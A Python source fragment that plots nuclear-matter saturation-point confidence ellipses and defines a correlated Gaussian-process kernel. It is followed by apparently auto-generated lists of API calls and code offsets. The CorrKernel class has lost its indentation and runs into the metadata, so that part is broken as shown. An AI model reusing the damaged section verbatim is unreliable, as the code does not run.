        The axis to draw on; defaults to the current axis.
    savefig : bool, optional
        Present for interface symmetry; saving is a no-op here.
    color : optional
        Color for the ellipse and bands; defaults to the order's color.
    nugget : float, optional
        Diagonal noise added to the covariance when sampling minima.
    X : ndarray, optional
        Input points; defaults to `self.X`.
    cond : optional
        Conditioning mask passed to `compute_minimum`.
    n_samples : int, optional
        Number of samples used to estimate the minimum distribution.
    is_density_primary : bool, optional
        Whether the x-axis is density (True) or Fermi momentum (False).

    Returns
    -------
    (ax, ellipse)
        The axis and the confidence-ellipse artist (for legend handles).
    """
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    if ax is None:
        ax = plt.gca()
    if X is None:
        X = self.X
    x_min_no_trunc, y_min_no_trunc, x_min, y_min, pred, cov = self.compute_minimum(
        order=order, n_samples=n_samples, breakdown=breakdown, X=X, nugget=nugget, cond=cond
    )
    if 'zorder' not in kwargs:
        zorder = order / 10
    else:
        zorder = kwargs.copy().pop('zorder')
    if cond is None:
        cond = slice(None, None)
    # ord_idx = self.order_index(order)
    ord_idx = np.squeeze(np.argwhere(self.orders_original == order))
    # Window around the sampled minima, used for the (commented) scatter plots
    approx_xlim = x_min.min() - 0.03, x_min.max() + 0.03
    approx_xlim_mask = (self.X[cond].ravel() >= approx_xlim[0]) & (self.X[cond].ravel() <= approx_xlim[1])
    # is_density_primary = True
    if is_density_primary:
        # Convert momenta to densities for plotting
        x_min_no_trunc = self.compute_density(x_min_no_trunc)
        x_min = self.compute_density(x_min)
        x_all = self.compute_density(X.ravel())
    else:
        x_all = X.ravel()
    if color is None:
        color = self.colors_original[ord_idx]
    light_color = lighten_color(color)
    # TODO: Add scatter plots
    # compute z-scores from all EDFs?
    stdv = np.sqrt(np.diag(cov))
    from matplotlib.collections import LineCollection
    # ax.fill_between(X.ravel(), pred+stdv, pred-stdv, color=color, zorder=0, alpha=0.5)
    # ax.plot(X.ravel(), pred, c=color)
    ax.fill_between(
        x_all, pred+2*stdv, pred-2*stdv, facecolor=light_color,
        edgecolor=color, alpha=0.3, zorder=zorder
    )
    print('Order', order)
    print('x:', np.mean(x_min), '+/-', np.std(x_min))
    print('y:', np.mean(y_min), '+/-', np.std(y_min))
    print('mean:\n', np.array([np.mean(x_min), np.mean(y_min)]))
    print('cov:\n', np.cov(x_min, y_min))
    ellipse = confidence_ellipse(
        x_min, y_min, ax=ax, n_std=2, facecolor=light_color,
        edgecolor=color, zorder=zorder, show_scatter=True, **kwargs
    )
    # Draw the mean curve and its 2-sigma edges as a single collection
    col = LineCollection([
        np.column_stack((x_all, pred)),
        np.column_stack((x_all, pred + 2 * stdv)),
        np.column_stack((x_all, pred - 2 * stdv))
    ], colors=[color, color, color], linewidths=[1.2, 0.7, 0.7], linestyles=['-', '-', '-'], zorder=zorder + 1e-2)
    ax.add_collection(col, autolim=False)
    # ax.plot(x_min_no_trunc, y_min_no_trunc, marker='x', ls='', markerfacecolor=color,
    #         markeredgecolor='k', markeredgewidth=0.5, label='True', zorder=10)
    ax.scatter(x_min_no_trunc, y_min_no_trunc, marker='X', facecolor=color,
               edgecolors='k', label=fr'min($y_{order}$)', zorder=10)
    # ax.scatter(x_min, y_min, marker='X', facecolor=color,
    #            edgecolors='k', label=fr'min($y_{order}$)', zorder=10)
    if self.body == 'NN-only':
        y = self.y2
    elif self.body == 'NN+3N':
        y = self.y3
    elif self.body == 'Appended':
        y = self.y3
    elif self.body == '3N':
        y = self.y3
    else:
        raise ValueError('body not in allowed values')
    if is_density_primary:
        # ax.plot(self.density[cond][approx_xlim_mask], y[cond, ord_idx][approx_xlim_mask],
        #         ls='', marker='o', c=color, zorder=zorder)
        ax.set_xlabel(r'Density $n$ [fm$^{-3}$]')
    else:
        # ax.plot(self.X[cond][approx_xlim_mask], y[cond, ord_idx][approx_xlim_mask],
        #         ls='', marker='o', c=color, zorder=zorder)
        ax.set_xlabel(r'Fermi Momentum $k_\mathrm{F}$ [fm$^{-1}$]')
    ax.set_ylabel(r'Energy per Particle $E/A$')
    # kf_ticks = ax.get_xticks()
    # d_ticks = self.compute_momentum(kf_ticks)
    # k_min, k_max = ax.get_xlim()
    # d = self.compute_density(np.array([k_min, k_max]))
    # ax2 = ax.twiny()
    # ax2.plot(d_ticks, np.average(y_min) * np.ones_like(d_ticks), ls='')
    # ax2.set_xticks(d_ticks)
    # is_density_primary = True
    self.plot_empirical_saturation(ax=ax, is_density_primary=is_density_primary)
    if savefig:
        pass
    return ax, ellipse
def plot_multi_saturation(self, breakdown=None, orders=None, ax=None, savefig=None, nugget=0, X=None,
                          cond=None, n_samples=1000, legend_kwargs=None, **kwargs):
    R"""Overlays saturation-point confidence ellipses for multiple orders on one axis.

    Parameters
    ----------
    breakdown : float, optional
        The breakdown scale. If `None`, its MAP value is used.
    orders : list of int, optional
        The orders to plot; defaults to [3, 4].
    ax : matplotlib.axes.Axes, optional
        The axis to draw on; defaults to the current axis.
    savefig : bool, optional
        Whether to save the figure.
    nugget, X, cond, n_samples
        Passed through to `plot_saturation` for each order.
    legend_kwargs : dict, optional
        Extra keyword arguments for the combined legend.

    Returns
    -------
    ax : matplotlib.axes.Axes
    """
    if orders is None:
        orders = [3, 4]
    if ax is None:
        ax = plt.gca()
    if legend_kwargs is None:
        legend_kwargs = dict()
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    ellipses = []
    ellipses_labels = []
    for order in orders:
        # idx = self.order_index(order)
        idx = np.squeeze(np.argwhere(self.orders_original == order))
        _, ellipse = self.plot_saturation(
            breakdown=breakdown, order=order, ax=ax, savefig=False, color=self.colors_original[idx],
            nugget=nugget, X=X, cond=cond, n_samples=n_samples, **kwargs)
        ellipses.append(ellipse)
        ellipses_labels.append(rf'$2\sigma(y_{{{order}}}+\delta y_{{{order}}})$')
    ax.margins(x=0)
    # Append the ellipse handles so they show up alongside the scatter markers
    handles, labels = ax.get_legend_handles_labels()
    handles = handles + ellipses
    labels = labels + ellipses_labels
    ax.legend(handles, labels, **legend_kwargs)
    fig = plt.gcf()
    # fig.tight_layout()
    if savefig:
        ords = [f'-{order}' for order in orders]
        ords = ''.join(ords)
        name = self.figure_name(f'sat_ellipse_ords{ords}_', breakdown=breakdown)
        print(name)
        fig.savefig(name)
    return ax
class CorrKernel(Kernel):
R"""A basic kernel with rho on the off-diagonal blocks. Will assume that all 4 blocks are the same size.
The diagonal blocks are filled with ones, and the off-diagonal blocks are filled with rho.
"""
def __init__(self, rho=0.5, rho_bounds=(1e-5, 1), std1=1, std2=1):
self.rho = rho
self.rho_bounds = rho_bounds
self.std1 = std1
self.std2 = std2
@property
def hyperparameter_rho(self):
from sklearn.gaussian_process.kernels import Hyperparameter
return Hyperparameter("rho", "numeric", self.rho_bounds)
def __call__(self, X, Y=None, eval_gradient=False):
nx = ny = len(X)
if Y is not None:
ny = len(Y)
ix = nx // 2
iy = ny // 2
stds_x = np.concatenate((self.std1 * np.ones(ix), self.std2 * np.ones(ix)))
stds_y = np.concatenate((self.std1 * np.ones(iy), self.std2 * np.ones(iy)))
K = np.ones((nx, ny), dtype=float)
K[ix:, :iy] = K[:ix, iy:] = self.rho
K *= stds_x[:, None] * stds_y
if eval_gradient:
dK = np.zeros((nx, ny, 1), dtype=float)
dK[ix:, :iy] = dK[:ix, iy:] = 1.
dK *= stds_x[:, None, None] * stds_y[None, :, None]
return K, dK
return K
def diag(self, X):
return np.ones(X.shape[0])
def is_stationary(self):
return False
    def __repr__(self):
        # e.g. "CorrKernel(rho=0.5)" — only rho is shown, matching the
        # concise repr style of sklearn kernels.
        return "{0}(rho={1:.3g})".format(
            self.__class__.__name__, self.rho) | [
"seaborn.utils.despine",
"matplotlib.pyplot.rc_context",
"numpy.log",
"numpy.column_stack",
"numpy.isin",
"matplotlib.ticker.MaxNLocator",
"numpy.cov",
"numpy.arange",
"numpy.exp",
"numpy.concatenate",
"warnings.warn",
"matplotlib.cm.get_cmap",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.g... | [((768, 795), 'docrep.DocstringProcessor', 'docrep.DocstringProcessor', ([], {}), '()\n', (793, 795), False, 'import docrep\n'), ((2330, 2371), 'numpy.trapz', 'np.trapz', (['posterior_2d'], {'x': 'lengths', 'axis': '(0)'}), '(posterior_2d, x=lengths, axis=0)\n', (2338, 2371), True, 'import numpy as np\n'), ((2393, 2430), 'numpy.trapz', 'np.trapz', (['breakdown_pdf'], {'x': 'breakdowns'}), '(breakdown_pdf, x=breakdowns)\n', (2401, 2430), True, 'import numpy as np\n'), ((3011, 3038), 'gsum.median_pdf', 'gm.median_pdf', ([], {'pdf': 'pdf', 'x': 'x'}), '(pdf=pdf, x=x)\n', (3024, 3038), True, 'import gsum as gm\n'), ((3737, 3773), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(height, height)'}), '(figsize=(height, height))\n', (3747, 3773), True, 'import matplotlib.pyplot as plt\n'), ((3784, 3818), 'matplotlib.pyplot.GridSpec', 'plt.GridSpec', (['(ratio + 1)', '(ratio + 1)'], {}), '(ratio + 1, ratio + 1)\n', (3796, 3818), True, 'import matplotlib.pyplot as plt\n'), ((4745, 4783), 'seaborn.utils.despine', 'utils.despine', ([], {'ax': 'ax_marg_x', 'left': '(True)'}), '(ax=ax_marg_x, left=True)\n', (4758, 4783), False, 'from seaborn import utils\n'), ((4788, 4828), 'seaborn.utils.despine', 'utils.despine', ([], {'ax': 'ax_marg_y', 'bottom': '(True)'}), '(ax=ax_marg_y, bottom=True)\n', (4801, 4828), False, 'from seaborn import utils\n'), ((6106, 6123), 'numpy.atleast_1d', 'np.atleast_1d', (['ls'], {}), '(ls)\n', (6119, 6123), True, 'import numpy as np\n'), ((6358, 6385), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (6383, 6385), False, 'import multiprocessing\n'), ((6900, 6941), 'numpy.trapz', 'np.trapz', (['joint_pdf'], {'x': 'breakdown', 'axis': '(-1)'}), '(joint_pdf, x=breakdown, axis=-1)\n', (6908, 6941), True, 'import numpy as np\n'), ((6981, 7021), 'numpy.trapz', 'np.trapz', (['ratio_pdf'], {'x': 'breakdown', 'axis': '(0)'}), '(ratio_pdf, x=breakdown, axis=0)\n', (6989, 7021), True, 'import numpy 
as np\n'), ((14106, 14151), 'scipy.stats.multivariate_normal', 'stats.multivariate_normal', ([], {'mean': 'mean', 'cov': 'cov'}), '(mean=mean, cov=cov)\n', (14131, 14151), False, 'from scipy import stats\n'), ((14191, 14217), 'numpy.argmin', 'np.argmin', (['samples'], {'axis': '(1)'}), '(samples, axis=1)\n', (14200, 14217), True, 'import numpy as np\n'), ((14230, 14253), 'numpy.min', 'np.min', (['samples'], {'axis': '(1)'}), '(samples, axis=1)\n', (14236, 14253), True, 'import numpy as np\n'), ((16855, 16911), 'colorsys.hls_to_rgb', 'colorsys.hls_to_rgb', (['c[0]', '(1 - amount * (1 - c[1]))', 'c[2]'], {}), '(c[0], 1 - amount * (1 - c[1]), c[2])\n', (16874, 16911), False, 'import colorsys\n'), ((21936, 21949), 'numpy.asarray', 'np.asarray', (['m'], {}), '(m)\n', (21946, 21949), True, 'import numpy as np\n'), ((22269, 22299), 'numpy.array', 'array', (['m'], {'ndmin': '(2)', 'dtype': 'dtype'}), '(m, ndmin=2, dtype=dtype)\n', (22274, 22299), False, 'from numpy import array, average, dot\n'), ((23922, 23966), 'numpy.average', 'average', (['X'], {'axis': '(1)', 'weights': 'w', 'returned': '(True)'}), '(X, axis=1, weights=w, returned=True)\n', (23929, 23966), False, 'from numpy import array, average, dot\n'), ((24520, 24543), 'numpy.true_divide', 'np.true_divide', (['(1)', 'fact'], {}), '(1, fact)\n', (24534, 24543), True, 'import numpy as np\n'), ((25296, 25334), 'numpy.block', 'np.block', (['[[K1, K_off], [K_off.T, K2]]'], {}), '([[K1, K_off], [K_off.T, K2]])\n', (25304, 25334), True, 'import numpy as np\n'), ((25622, 25641), 'numpy.atleast_1d', 'np.atleast_1d', (['ref1'], {}), '(ref1)\n', (25635, 25641), True, 'import numpy as np\n'), ((25653, 25672), 'numpy.atleast_1d', 'np.atleast_1d', (['ref2'], {}), '(ref2)\n', (25666, 25672), True, 'import numpy as np\n'), ((26133, 26152), 'numpy.atleast_1d', 'np.atleast_1d', (['ref1'], {}), '(ref1)\n', (26146, 26152), True, 'import numpy as np\n'), ((26164, 26183), 'numpy.atleast_1d', 'np.atleast_1d', (['ref2'], {}), '(ref2)\n', 
(26177, 26183), True, 'import numpy as np\n'), ((26976, 27014), 'numpy.block', 'np.block', (['[[K1, K_off], [K_off.T, K2]]'], {}), '([[K1, K_off], [K_off.T, K2]])\n', (26984, 27014), True, 'import numpy as np\n'), ((1275, 1352), 'matplotlib.patches.Ellipse', 'mpatches.Ellipse', ([], {'xy': 'center', 'width': '(width + xdescent)', 'height': '(height + ydescent)'}), '(xy=center, width=width + xdescent, height=height + ydescent)\n', (1291, 1352), True, 'import matplotlib.patches as mpatches\n'), ((2053, 2068), 'numpy.exp', 'np.exp', (['log_ell'], {}), '(log_ell)\n', (2059, 2068), True, 'import numpy as np\n'), ((2097, 2112), 'numpy.log', 'np.log', (['lengths'], {}), '(lengths)\n', (2103, 2112), True, 'import numpy as np\n'), ((2964, 2997), 'gsum.hpd_pdf', 'gm.hpd_pdf', ([], {'pdf': 'pdf', 'alpha': 'p', 'x': 'x'}), '(pdf=pdf, alpha=p, x=x)\n', (2974, 2997), True, 'import gsum as gm\n'), ((3190, 3199), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3197, 3199), True, 'import matplotlib.pyplot as plt\n'), ((6019, 6061), 'numpy.exp', 'np.exp', (['model.coeffs_process.kernel_.theta'], {}), '(model.coeffs_process.kernel_.theta)\n', (6025, 6061), True, 'import numpy as np\n'), ((6801, 6834), 'numpy.trapz', 'np.trapz', (['joint_pdf'], {'x': 'ls', 'axis': '(0)'}), '(joint_pdf, x=ls, axis=0)\n', (6809, 6834), True, 'import numpy as np\n'), ((6865, 6886), 'numpy.squeeze', 'np.squeeze', (['joint_pdf'], {}), '(joint_pdf)\n', (6875, 6886), True, 'import numpy as np\n'), ((7060, 7090), 'numpy.trapz', 'np.trapz', (['ls_pdf'], {'x': 'ls', 'axis': '(0)'}), '(ls_pdf, x=ls, axis=0)\n', (7068, 7090), True, 'import numpy as np\n'), ((7389, 7454), 'matplotlib.pyplot.rc_context', 'plt.rc_context', (["{'text.usetex': True, 'text.latex.preview': True}"], {}), "({'text.usetex': True, 'text.latex.preview': True})\n", (7403, 7454), True, 'import matplotlib.pyplot as plt\n'), ((7499, 7518), 'matplotlib.cm.get_cmap', 'get_cmap', (['cmap_name'], {}), '(cmap_name)\n', (7507, 7518), False, 
'from matplotlib.cm import get_cmap\n'), ((8743, 8753), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8751, 8753), True, 'import matplotlib.pyplot as plt\n'), ((10448, 10486), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'figsize': '(3.4, 3.4)'}), '(1, 1, figsize=(3.4, 3.4))\n', (10460, 10486), True, 'import matplotlib.pyplot as plt\n'), ((10905, 10968), 'seaborn.color_palette', 'sns.color_palette', (['palette'], {'n_colors': 'n_colors', 'desat': 'saturation'}), '(palette, n_colors=n_colors, desat=saturation)\n', (10922, 10968), True, 'import seaborn as sns\n'), ((11140, 11153), 'matplotlib.pyplot.margins', 'plt.margins', ([], {}), '()\n', (11151, 11153), True, 'import matplotlib.pyplot as plt\n'), ((22061, 22090), 'numpy.result_type', 'np.result_type', (['m', 'np.float64'], {}), '(m, np.float64)\n', (22075, 22090), True, 'import numpy as np\n'), ((22113, 22126), 'numpy.asarray', 'np.asarray', (['y'], {}), '(y)\n', (22123, 22126), True, 'import numpy as np\n'), ((22227, 22259), 'numpy.result_type', 'np.result_type', (['m', 'y', 'np.float64'], {}), '(m, y, np.float64)\n', (22241, 22259), True, 'import numpy as np\n'), ((22455, 22497), 'numpy.array', 'array', (['y'], {'copy': '(False)', 'ndmin': '(2)', 'dtype': 'dtype'}), '(y, copy=False, ndmin=2, dtype=dtype)\n', (22460, 22497), False, 'from numpy import array, average, dot\n'), ((22573, 22603), 'numpy.concatenate', 'np.concatenate', (['(X, y)'], {'axis': '(0)'}), '((X, y), axis=0)\n', (22587, 22603), True, 'import numpy as np\n'), ((22815, 22848), 'numpy.asarray', 'np.asarray', (['fweights'], {'dtype': 'float'}), '(fweights, dtype=float)\n', (22825, 22848), True, 'import numpy as np\n'), ((23415, 23448), 'numpy.asarray', 'np.asarray', (['aweights'], {'dtype': 'float'}), '(aweights, dtype=float)\n', (23425, 23448), True, 'import numpy as np\n'), ((24263, 24348), 'warnings.warn', 'warnings.warn', (['"""Degrees of freedom <= 0 for slice"""', 'RuntimeWarning'], {'stacklevel': '(3)'}), 
"('Degrees of freedom <= 0 for slice', RuntimeWarning, stacklevel=3\n )\n", (24276, 24348), False, 'import warnings\n'), ((24679, 24713), 'numpy.sqrt', 'np.sqrt', (['((ls1 ** 2 + ls2 ** 2) / 2)'], {}), '((ls1 ** 2 + ls2 ** 2) / 2)\n', (24686, 24713), True, 'import numpy as np\n'), ((24728, 24774), 'numpy.sqrt', 'np.sqrt', (['(2 * ls1 * ls2 / (ls1 ** 2 + ls2 ** 2))'], {}), '(2 * ls1 * ls2 / (ls1 ** 2 + ls2 ** 2))\n', (24735, 24774), True, 'import numpy as np\n'), ((24814, 24841), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std1 * std2)'], {}), '(std1 * std2)\n', (24828, 24841), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((24844, 24855), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls_off'], {}), '(ls_off)\n', (24847, 24855), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25010, 25035), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std1 ** 2)'], {}), '(std1 ** 2)\n', (25024, 25035), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25038, 25046), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls1'], {}), '(ls1)\n', (25041, 25046), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25363, 25386), 'numpy.diag_indices_from', 'np.diag_indices_from', (['K'], {}), '(K)\n', (25383, 25386), True, 'import numpy as np\n'), ((25838, 25858), 'numpy.sqrt', 'np.sqrt', (['(1 - Q1 ** 2)'], {}), '(1 - Q1 ** 2)\n', (25845, 25858), True, 'import numpy as np\n'), ((25881, 25901), 'numpy.sqrt', 'np.sqrt', (['(1 - Q2 ** 2)'], {}), '(1 - Q2 ** 2)\n', (25888, 25901), True, 'import numpy as np\n'), ((26422, 26437), 'numpy.sqrt', 'np.sqrt', (['Q_num1'], {}), '(Q_num1)\n', (26429, 26437), True, 'import numpy as np\n'), ((26440, 26460), 'numpy.sqrt', 'np.sqrt', (['(1 - Q1 ** 2)'], {}), '(1 - Q1 ** 2)\n', (26447, 26460), True, 'import numpy as np\n'), ((26474, 26489), 
'numpy.sqrt', 'np.sqrt', (['Q_num2'], {}), '(Q_num2)\n', (26481, 26489), True, 'import numpy as np\n'), ((26492, 26512), 'numpy.sqrt', 'np.sqrt', (['(1 - Q2 ** 2)'], {}), '(1 - Q2 ** 2)\n', (26499, 26512), True, 'import numpy as np\n'), ((26523, 26548), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std1 ** 2)'], {}), '(std1 ** 2)\n', (26537, 26548), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26551, 26559), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls1'], {}), '(ls1)\n', (26554, 26559), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((27043, 27066), 'numpy.diag_indices_from', 'np.diag_indices_from', (['K'], {}), '(K)\n', (27063, 27066), True, 'import numpy as np\n'), ((30632, 30653), 'numpy.atleast_1d', 'np.atleast_1d', (['orders'], {}), '(orders)\n', (30645, 30653), True, 'import numpy as np\n'), ((35133, 35158), 'numpy.atleast_1d', 'np.atleast_1d', (['colors_all'], {}), '(colors_all)\n', (35146, 35158), True, 'import numpy as np\n'), ((35303, 35333), 'numpy.atleast_1d', 'np.atleast_1d', (['colors_original'], {}), '(colors_original)\n', (35316, 35333), True, 'import numpy as np\n'), ((35542, 35564), 'numpy.atleast_1d', 'np.atleast_1d', (['markers'], {}), '(markers)\n', (35555, 35564), True, 'import numpy as np\n'), ((35676, 35707), 'numpy.atleast_1d', 'np.atleast_1d', (['markerfillstyles'], {}), '(markerfillstyles)\n', (35689, 35707), True, 'import numpy as np\n'), ((35825, 35850), 'numpy.atleast_1d', 'np.atleast_1d', (['linestyles'], {}), '(linestyles)\n', (35838, 35850), True, 'import numpy as np\n'), ((36172, 36220), 'gsum.coefficients', 'gm.coefficients', (['self.y', 'ratio', 'ref', 'self.orders'], {}), '(self.y, ratio, ref, self.orders)\n', (36187, 36220), True, 'import gsum as gm\n'), ((43274, 43330), 'numpy.linspace', 'np.linspace', (['breakdown_min', 'breakdown_max', 'breakdown_num'], {}), '(breakdown_min, breakdown_max, breakdown_num)\n', 
(43285, 43330), True, 'import numpy as np\n'), ((43552, 43574), 'numpy.atleast_1d', 'np.atleast_1d', (['max_idx'], {}), '(max_idx)\n', (43565, 43574), True, 'import numpy as np\n'), ((45312, 45355), 'pandas.concat', 'pd.concat', (['dfs_breakdown'], {'ignore_index': '(True)'}), '(dfs_breakdown, ignore_index=True)\n', (45321, 45355), True, 'import pandas as pd\n'), ((45480, 45519), 'pandas.concat', 'pd.concat', (['dfs_joint'], {'ignore_index': '(True)'}), '(dfs_joint, ignore_index=True)\n', (45489, 45519), True, 'import pandas as pd\n'), ((46834, 46874), 'gsum.ConjugateGaussianProcess', 'gm.ConjugateGaussianProcess', ([], {}), '(**gp_kwargs)\n', (46861, 46874), True, 'import gsum as gm\n'), ((47542, 47681), 'gsum.GraphicalDiagnostic', 'gm.GraphicalDiagnostic', (['data', 'mean', 'cov'], {'colors': 'colors', 'gray': 'gray', 'black': 'softblack', 'markerfillstyles': 'markerfillstyles', 'markers': 'markers'}), '(data, mean, cov, colors=colors, gray=gray, black=\n softblack, markerfillstyles=markerfillstyles, markers=markers)\n', (47564, 47681), True, 'import gsum as gm\n'), ((47913, 48004), 'gsum.TruncationGP', 'gm.TruncationGP', ([], {'ref': 'self.ref', 'ratio': 'self.ratio', 'excluded': 'self.excluded'}), '(ref=self.ref, ratio=self.ratio, excluded=self.excluded, **\n self.kwargs)\n', (47928, 48004), True, 'import gsum as gm\n'), ((51710, 51725), 'numpy.argmin', 'np.argmin', (['pred'], {}), '(pred)\n', (51719, 51725), True, 'import numpy as np\n'), ((53579, 53609), 'os.path.join', 'join', (['self.fig_path', 'full_name'], {}), '(self.fig_path, full_name)\n', (53583, 53609), False, 'from os.path import join\n'), ((58177, 58219), 'gsum.ConjugateGaussianProcess', 'gm.ConjugateGaussianProcess', ([], {}), '(**self.kwargs)\n', (58204, 58219), True, 'import gsum as gm\n'), ((79519, 79545), 'numpy.linspace', 'np.linspace', (['(1e-05)', '(1)', '(100)'], {}), '(1e-05, 1, 100)\n', (79530, 79545), True, 'import numpy as np\n'), ((80469, 80478), 'matplotlib.pyplot.gcf', 'plt.gcf', 
([], {}), '()\n', (80476, 80478), True, 'import matplotlib.pyplot as plt\n'), ((81239, 81374), 'matplotlib.patches.Rectangle', 'Rectangle', (['(left, y0 - y0_std)'], {'width': '(right - left)', 'height': '(2 * y0_std)', 'facecolor': '"""lightgray"""', 'edgecolor': '"""gray"""', 'alpha': '(0.4)', 'zorder': '(9)'}), "((left, y0 - y0_std), width=right - left, height=2 * y0_std,\n facecolor='lightgray', edgecolor='gray', alpha=0.4, zorder=9)\n", (81248, 81374), False, 'from matplotlib.patches import Rectangle\n'), ((87333, 87342), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (87340, 87342), True, 'import matplotlib.pyplot as plt\n'), ((88190, 88239), 'sklearn.gaussian_process.kernels.Hyperparameter', 'Hyperparameter', (['"""rho"""', '"""numeric"""', 'self.rho_bounds'], {}), "('rho', 'numeric', self.rho_bounds)\n", (88204, 88239), False, 'from sklearn.gaussian_process.kernels import Hyperparameter\n'), ((88597, 88627), 'numpy.ones', 'np.ones', (['(nx, ny)'], {'dtype': 'float'}), '((nx, ny), dtype=float)\n', (88604, 88627), True, 'import numpy as np\n'), ((88981, 89000), 'numpy.ones', 'np.ones', (['X.shape[0]'], {}), '(X.shape[0])\n', (88988, 89000), True, 'import numpy as np\n'), ((2291, 2307), 'numpy.max', 'np.max', (['log_like'], {}), '(log_like)\n', (2297, 2307), True, 'import numpy as np\n'), ((6742, 6758), 'numpy.max', 'np.max', (['log_like'], {}), '(log_like)\n', (6748, 6758), True, 'import numpy as np\n'), ((8012, 8034), 'numpy.zeros_like', 'np.zeros_like', (['like_Lb'], {}), '(like_Lb)\n', (8025, 8034), True, 'import numpy as np\n'), ((8204, 8226), 'numpy.zeros_like', 'np.zeros_like', (['ls_vals'], {}), '(ls_vals)\n', (8217, 8226), True, 'import numpy as np\n'), ((11678, 11704), 'numpy.trapz', 'np.trapz', (['pdf_vals', 'x_vals'], {}), '(pdf_vals, x_vals)\n', (11686, 11704), True, 'import numpy as np\n'), ((13085, 13142), 'matplotlib.patches.Patch', 'Patch', ([], {'facecolor': 'color', 'edgecolor': 'darkgray', 'label': 'leg_val'}), '(facecolor=color, 
edgecolor=darkgray, label=leg_val)\n', (13090, 13142), False, 'from matplotlib.patches import Patch\n'), ((16830, 16842), 'matplotlib.colors.to_rgb', 'mc.to_rgb', (['c'], {}), '(c)\n', (16839, 16842), True, 'import matplotlib.colors as mc\n'), ((25080, 25105), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std2 ** 2)'], {}), '(std2 ** 2)\n', (25094, 25105), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25108, 25116), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls2'], {}), '(ls2)\n', (25111, 25116), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25140, 25165), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std2 ** 2)'], {}), '(std2 ** 2)\n', (25154, 25165), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25168, 25176), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls1'], {}), '(ls1)\n', (25171, 25176), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26593, 26618), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std2 ** 2)'], {}), '(std2 ** 2)\n', (26607, 26618), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26621, 26629), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls2'], {}), '(ls2)\n', (26624, 26629), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26653, 26678), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std2 ** 2)'], {}), '(std2 ** 2)\n', (26667, 26678), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26681, 26689), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls1'], {}), '(ls1)\n', (26684, 26689), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((31321, 31371), 'gsum.coefficients', 'gm.coefficients', (['y2', 
'ratio_vals', 'ref2_vals', 'orders'], {}), '(y2, ratio_vals, ref2_vals, orders)\n', (31336, 31371), True, 'import gsum as gm\n'), ((31389, 31444), 'gsum.coefficients', 'gm.coefficients', (['(y3 - y2)', 'ratio_vals', 'ref3_vals', 'orders'], {}), '(y3 - y2, ratio_vals, ref3_vals, orders)\n', (31404, 31444), True, 'import gsum as gm\n'), ((32427, 32447), 'numpy.array', 'np.array', (['orders_all'], {}), '(orders_all)\n', (32435, 32447), True, 'import numpy as np\n'), ((32521, 32570), 'gsum.partials', 'gm.partials', (['c', 'ratio_vals', 'ref2_vals', 'orders_all'], {}), '(c, ratio_vals, ref2_vals, orders_all)\n', (32532, 32570), True, 'import gsum as gm\n'), ((34655, 34692), 'numpy.ones_like', 'np.ones_like', (['self.orders'], {'dtype': 'bool'}), '(self.orders, dtype=bool)\n', (34667, 34692), True, 'import numpy as np\n'), ((34939, 34971), 'numpy.ones_like', 'np.ones_like', (['orders'], {'dtype': 'bool'}), '(orders, dtype=bool)\n', (34951, 34971), True, 'import numpy as np\n'), ((38400, 38418), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['name'], {}), '(name)\n', (38412, 38418), True, 'import matplotlib.pyplot as plt\n'), ((43449, 43484), 'numpy.linspace', 'np.linspace', (['ls_min', 'ls_max', 'ls_num'], {}), '(ls_min, ls_max, ls_num)\n', (43460, 43484), True, 'import numpy as np\n'), ((44634, 44661), 'gsum.cartesian', 'gm.cartesian', (['ls', 'breakdown'], {}), '(ls, breakdown)\n', (44646, 44661), True, 'import gsum as gm\n'), ((44685, 44755), 'pandas.DataFrame', 'pd.DataFrame', (['X'], {'columns': "['$\\\\ell$ [fm$^{-1}$]', '$\\\\Lambda_b$ [MeV]']"}), "(X, columns=['$\\\\ell$ [fm$^{-1}$]', '$\\\\Lambda_b$ 